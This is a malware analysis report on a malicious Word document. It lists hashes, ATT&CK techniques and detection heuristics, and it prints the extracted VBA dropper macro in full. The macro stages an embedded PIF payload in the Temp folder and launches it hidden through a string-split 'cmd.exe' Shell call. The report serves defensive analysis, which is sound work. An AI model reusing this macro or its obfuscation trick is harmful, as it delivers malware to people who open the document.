Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e992ffe746b40d97…

MALICIOUS

Office (OLE)

176.0 KB Created: 2018-06-28 15:48:00 Authoring application: Microsoft Office Word First seen: 2019-11-20
MD5: aec604d1c5a05ad60951c6a0f81447db SHA-1: 875c67b433a9d7f7f488820dc95d40fb2c81a0ab SHA-256: e992ffe746b40d97baf56098e2110ff3978f8229ca333e87e24d1539cea7415c
538 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample exploits CVE-2007-3899, a memory corruption vulnerability in Microsoft Word, to achieve code execution. The Document_Open macro attempts to copy content and then executes a command using the reassembled string 'cmd.exe'. The Document_Close macro also attempts to execute 'cmd.exe' to start a PIF file dropped in the temporary directory. The presence of VirtualProtect, LoadLibrary, and GetProcAddress API calls suggests the loaded payload is likely a downloader or backdoor.

Heuristics 14

  • CVE-2007-3899 — Microsoft Word malformed string memory corruption critical CVE likely CVE_2007_3899
    Word OLE document has the MS07-060 malformed-string exploit shape: a Word 97-family FIB points to a malformed DOP/string-table region with an abnormal INT_MAX run, inflated text counters, and exploit payload or Mdropper.Z campaign evidence.
  • Office EPRINT stream contains EMF object high CVE related OLE_EPRINT_EMF_OBJECT
    OLE ObjectPool contains an EPRINT stream with EMF data. This is rare in normal documents and is related Office object-delivery evidence when paired with exploit payload anomalies, but the malformed graphics record required for exact CVE attribution is not proven by this rule alone.
  • ClamAV: Doc.Dropper.Agent-6595074-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6595074-0
  • XOR-encoded strings (key 0xAB) critical SC_XOR_ENCODED
    Found 3 Windows library/API name(s) XOR-encoded with single-byte key 0xAB: 'LoadLibraryA', 'GetProcAddress', 'VirtualAlloc'
    Disassembly hidden — these bytes score as data, not coherent x86 code (1/4 branch targets land on an instruction boundary (25% coherence)).
  • Ole10Native package drops an auto-executable payload critical OFFICE_PACKAGE_RISKY_FILE
    OLE Package displayName or fullPath ends in a directly auto-executable extension (a runnable binary or a script the default shell host runs on double-click). Embedding such a payload inside an Office document has no benign authoring use — it is a malware-delivery dropper.
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Shell "cm" & "d.e" & "xe /c  pi" & "ng loc" & "alhost -n 100 && start " & Environ("Temp") & "\6C.pif", vbHide
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
    Matched line in script
    Shell "cm" & "d.e" & "xe /c  pi" & "ng loc" & "alhost -n 100 && start " & Environ("Temp") & "\6C.pif", vbHide
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    FileCopy Environ("Temp") & "\5C.pif", Environ("Temp") & "\6C.pif"
  • Reference to LoadLibrary API high SC_STR_LOADLIBRARY
    Reference to LoadLibrary API
  • Reference to GetProcAddress API high SC_STR_GETPROCADDRESS
    Reference to GetProcAddress API
  • Reference to VirtualProtect API medium SC_STR_VIRTUALPROTECT
    Reference to VirtualProtect API
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://secure.comodo.net/CPS0C In document text (OLE body)
    • http://ocsp.comodoca.com0In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
    • http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
    • http://purl.org/dc/elements/1.1/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
    • http://crl.comodoca.com/COMODORSACodeSigningCA.crl0tIn document text (OLE body)
    • http://crt.comodoca.com/COMODORSACodeSigningCA.crt0$In document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas🔏 SignedVBA project digital signature
Covers VBA source only — not the compiled p-code. A digital signature does not by itself mean the macro is safe.
vba-macro oletools.olevba.extract_macros (decoded VBA source) 1347 bytes
SHA-256: ea2604151079cdab9ae323cf62220f2c04e6560f5f3d26f5955b3e591348b44a
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
On Error Resume Next
Application.DisplayAlerts = False
Dim Str As String

    Selection.MoveDown Unit:=wdScreen, Count:=7
    Selection.MoveDown Unit:=wdScreen, Count:=7
    Selection.MoveRight Unit:=wdCharacter, Count:=13
    Selection.TypeBackspace
    Selection.Copy
    

FileCopy Environ("Temp") & "\5C.pif", Environ("Temp") & "\6C.pif"

Selection.TypeBackspace
 Set d = New DataObject
    d.SetText " "
    d.PutInClipboard
    Selection.MoveUp Unit:=wdScreen, Count:=7
   Selection.MoveUp Unit:=wdScreen, Count:=7
    Selection.MoveLeft Unit:=wdCharacter, Count:=13
    Dim t As Date
    t = Now
    Do
        DoEvents
    Loop Until Now >= DateAdd("s", 3, t)


Call Module1.killo

End Sub
Private Sub Document_Close()
Shell "cm" & "d.e" & "xe /c  pi" & "ng loc" & "alhost -n 100 && start " & Environ("Temp") & "\6C.pif", vbHide
End Sub






Attribute VB_Name = "Module1"
Sub killo()
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatXMLDocument
End Sub
ole10native_00.bin ole-package OLE Ole10Native stream: ObjectPool/_1591716974/Ole10Native 70884 bytes
SHA-256: 2eee3bd02db4b19b89b3849feb31331af2d67eeec8577c44f0c5a6c729d33bf7
ole10native_00_5C.pif ole-package-payload OLE Ole10Native payload: ObjectPool/_1591716974/Ole10Native; display_name=5C.pif; full_path=C:\Users\win7home\AppData\Local\Temp\5C.pif; temp_path=; def_file= 70608 bytes
SHA-256: cd78243e2a4e94cd61aa95edfb4708ceeed5a3ed50ee9b81c57d0935908eb23e